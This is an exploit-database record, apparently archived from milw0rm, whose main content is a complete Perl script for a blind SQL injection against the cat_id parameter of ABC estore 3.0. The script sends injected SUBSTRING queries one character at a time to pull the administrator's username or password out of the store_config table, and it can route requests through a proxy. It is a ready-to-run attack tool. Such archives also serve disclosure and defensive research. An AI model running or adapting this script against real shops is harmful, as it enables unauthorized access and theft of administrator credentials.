DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2020-04-01T19:03:59", "references": [], "description": "\nABC estore 3.0 - cat_id Blind SQL Injection", "edition": 1, "reporter": "k1tk4t", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2007-08-29T00:00:00", "title": "ABC estore 3.0 - cat_id Blind SQL Injection", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2007-08-29T00:00:00", "id": "EXPLOITPACK:7E9817C743F4E94F4814CCBD17069287", "href": "", "viewCount": 4, "sourceData": "#!/usr/bin/perl\nuse LWP::UserAgent;\nuse Getopt::Long;\n\nif(!$ARGV[1])\n{\n print \"\\n |-------------------------------------------------|\";\n print \"\\n | newhack[dot]org |\";\n print \"\\n |-------------------------------------------------|\";\n print \"\\n | ABC estore 3.0 (cat_id) Blind SQL Injection |\";\n print \"\\n | Found by k1tk4t [k1tk4t(at)newhack.org] |\";\n print \"\\n | DNX Code [dnx(at)hackermail.com] | Modified |\";\n print \"\\n |-------------------------------------------------|\";\n print \"\\n[!] Vendor: http://www.webtoolup.com/\";\n print \"\\n[!] Bug: in the index.php script, u can inject sql code in the (cat_id) parameter\";\n print \"\\n[!] Need Subcategories Product for success exploit\";\n print \"\\n[!] Usage: perl abcestore.pl [Host] [Path] <Options>\";\n print \"\\n[!] Example: perl abcestore.pl 127.0.0.1 /shop/ -c 10 -o 1 -t store_config\";\n print \"\\n[!] Options:\";\n print \"\\n -c [no] Valid cat_id products with subcategories, default is 1\";\n print \"\\n -o [no] 1 = get username (default)\";\n print \"\\n 2 = get password\";\n print \"\\n -t [name] Changes the admin table name, default is store_config\";\n print \"\\n -p [ip:port] Proxy support\";\n print \"\\n\";\n exit;\n}\n\nmy $host = $ARGV[0];\nmy $path = $ARGV[1];\nmy $cat = 1;\nmy $column = \"user\";\nmy $table = \"store_config\";\nmy %options = ();\nGetOptions(\\%options, \"c=i\", \"o=i\", \"t=s\", \"p=s\");\n\nprint \"[!] Exploiting...\\n\";\n\nif($options{\"c\"}) { $cat = $options{\"c\"}; }\nif($options{\"o\"} && $options{\"o\"} == 2) { $column = \"pass\"; }\nif($options{\"t\"}) { $table = $options{\"t\"}; }\n\nsyswrite(STDOUT, \"[!] Data : \", 12);\n\nfor(my $i = 1; $i <= 32; $i++)\n{\n my $found = 0;\n my $h = 48;\n while(!$found && $h <= 57)\n {\n if(istrue2($host, $path, $table, $i, $h))\n {\n $found = 1;\n syswrite(STDOUT, chr($h), 1);\n }\n $h++;\n }\n if(!$found)\n {\n $h = 97;\n while(!$found && $h <= 122)\n {\n if(istrue2($host, $path, $table, $i, $h))\n {\n $found = 1;\n syswrite(STDOUT, chr($h), 1);\n }\n $h++;\n }\n }\n}\n\nprint \"\\n[!] Exploit done\\n\";\n\nsub istrue2\n{\n my $host = shift;\n my $path = shift;\n my $table = shift;\n my $i = shift;\n my $h = shift;\n\n my $ua = LWP::UserAgent->new;\n my $url = \"http://\".$host.$path.\"index.php?cat_id=\".$cat.\"%20AND%20SUBSTRING((SELECT%20\".$column.\"%20FROM%20\".$table.\"%20LIMIT%200,1),\".$i.\",1)=CHAR(\".$h.\")\";\n\n if($options{\"p\"})\n {\n $ua->proxy('http', \"http://\".$options{\"p\"});\n }\n\n my $response = $ua->get($url);\n my $content = $response->content;\n my $regexp = \"Subcategories\";\n\n if($content =~ /$regexp/)\n {\n return 1;\n }\n else\n {\n return 0;\n }\n}\n\n# milw0rm.com [2007-08-29]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645592153, "score": 1659814272}, "_internal": {"score_hash": "158dfb8c4b0f1f27b6769f2718a444f6"}}

{}